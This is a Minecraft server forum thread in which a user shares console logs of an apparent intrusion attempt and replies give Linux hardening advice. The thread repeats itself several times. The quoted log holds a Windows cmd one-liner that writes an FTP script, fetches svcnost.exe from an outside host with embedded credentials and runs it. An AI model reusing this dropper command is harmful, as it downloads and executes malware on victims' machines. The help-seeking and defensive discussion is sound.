Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my minecraft command prompt logs:
>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.
Now, I'm quite new at linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions?
1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?
Ive closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.
If anyone needs more info from me, I will be happy to provide.
Hey guys,
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my minecraft command prompt logs:
>
17:28:06 [INFO] Unknown console command. Type "help" for help.
>7~
17:28:10 [INFO] Unknown console command. Type "help" for help.
>
17:28:13 [INFO] Unknown console command. Type "help" for help.
>cmd /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit
17:28:38 [INFO] Unknown console command. Type "help" for help.
>echo You got owned
17:28:42 [INFO] Unknown console command. Type "help" for help.
>
17:28:44 [INFO] Unknown console command. Type "help" for help.
Now, I'm quite new at linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions?
1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?
Ive closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.
If anyone needs more info from me, I will be happy to provide.
Cheers guys, and oh! First Post!
- Neko22
The good: That was a windows attack... so it wouldn't have an affect on your linux box. (but the FTP command will work even if you don't have an ftp server running, it's just a transfer protocol. So IF it worked, the files would have still gotten through)
However, I would suggest you take a look at your logs.
Where did you see that? When you opened your console, or in server.log?
If it's in the console, you need to take some steps to protect yourself.
0) DON'T use the root account to run minecraft.
1) For ****'s sake... DISABLE ROOT LOGIN for SSH if not already done. If you really need root, you can use 'su' from your user account.
2) Disable all non-used user accounts, and create very secure passwords for the ones that remain open, lest you find them broken into using a standard brute force attack.
3) You can keep SSH, but I highly recommend changing the port to something other than any commonly used port... 14242, or some ****. just be sure you are using the '-p <port>' flag when sshing into your box from a term. This will help deter automated scripts that get a hold of your IP from running brute force attacks on your server.
4) Verify if you are being attacked by looking at your logs... In Debian and like flavors, you can find them in /var/log/
You can do a few things here... actively tail your auth.log file via 'tail -f auth.log' or you can throw the last few thousand lines into another file so you can take a gander: 'tail -n 2500 auth.log >> ~/access_log.txt'
I'm not gonna lie, you make it sound like Minecraft would let some one force feed files via FTP onto windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...
I'm not gonna lie, you make it sound like Minecraft would let some one force feed files via FTP onto windows machines... and if that's the case I am gonna be waiting for Notch to make a post about how he is going to attempt to prevent it...
Well... that's not true... the code was probably sent via automation.... if you look at that command, you can see it uses 'cmd' which means it is probably try to start it using the 'Run...' command of windows... His information is limited, so we don't know how he found that info on his server. None of those commands would ever work from the Mincraft console as it's just not designed that way...
hence all of the "[INFO] Unknown console command. Type "help" for help." ****.
Given his description, that may have occurred because he just didn't secure his server correctly and someone brute forced his system to get in. THIS is why people that think they can just start up a server get so ****ed over when they start advertising their IP to the world.
You are freaking out from basic lack of knowledge in that area, just stop...
Thanks guys for your help, I've done all the things you suggested so I think I'm a little bit safer now.
I couldn't see anything in the logs per-say, but I no doubt missed something. In any case I think the hole is closed now.
I'm think I'm going to go read up some more now...
Rollback Post to RevisionRollBack
To post a comment, please login or register a new account.
Sorry I did try looking for a similar post but I couldn't find anything.
I run a small private linux server on my Acer Revo R3700 (ace little thing btw!), with CraftBukkit installed and the Dynmap plugin running. Just got back recently and noticed this little gem on my minecraft command prompt logs:
Now, I'm quite new at linux (only been playing around with it for a couple of weeks now), but I googled it and found out that they were attempting to FTP up a dodgy file, but I really have two questions?
1) Will this have done any damage to my server? I'm not running FTP or anything, so I'm 99% sure this did nothing as it was run inside minecraft, but if they managed to get into here, they must have been able to hijack my user surely?
2) Does anyone have an idea how they got in in the first place, and how I can stop them doing so again?
Ive closed down several of the ports that I think might have had a part to play in it (an external SSH port and a couple others), but if anyone has any advice I am all ears, so to speak.
If anyone needs more info from me, I will be happy to provide.
Cheers guys, and oh! First Post!
- Neko22
The good: That was a windows attack... so it wouldn't have an affect on your linux box. (but the FTP command will work even if you don't have an ftp server running, it's just a transfer protocol. So IF it worked, the files would have still gotten through)
However, I would suggest you take a look at your logs.
Where did you see that? When you opened your console, or in server.log?
If it's in the console, you need to take some steps to protect yourself.
0) DON'T use the root account to run minecraft.
1) For ****'s sake... DISABLE ROOT LOGIN for SSH if not already done. If you really need root, you can use 'su' from your user account.
2) Disable all non-used user accounts, and create very secure passwords for the ones that remain open, lest you find them broken into using a standard brute force attack.
3) You can keep SSH, but I highly recommend changing the port to something other than any commonly used port... 14242, or some ****. just be sure you are using the '-p <port>' flag when sshing into your box from a term. This will help deter automated scripts that get a hold of your IP from running brute force attacks on your server.
4) Verify if you are being attacked by looking at your logs... In Debian and like flavors, you can find them in /var/log/
You can do a few things here... actively tail your auth.log file via 'tail -f auth.log' or you can throw the last few thousand lines into another file so you can take a gander: 'tail -n 2500 auth.log >> ~/access_log.txt'
Lulz
Well... that's not true... the code was probably sent via automation.... if you look at that command, you can see it uses 'cmd' which means it is probably try to start it using the 'Run...' command of windows... His information is limited, so we don't know how he found that info on his server. None of those commands would ever work from the Mincraft console as it's just not designed that way...
hence all of the "[INFO] Unknown console command. Type "help" for help." ****.
Given his description, that may have occurred because he just didn't secure his server correctly and someone brute forced his system to get in. THIS is why people that think they can just start up a server get so ****ed over when they start advertising their IP to the world.
You are freaking out from basic lack of knowledge in that area, just stop...
Lulz
I couldn't see anything in the logs per-say, but I no doubt missed something. In any case I think the hole is closed now.
I'm think I'm going to go read up some more now...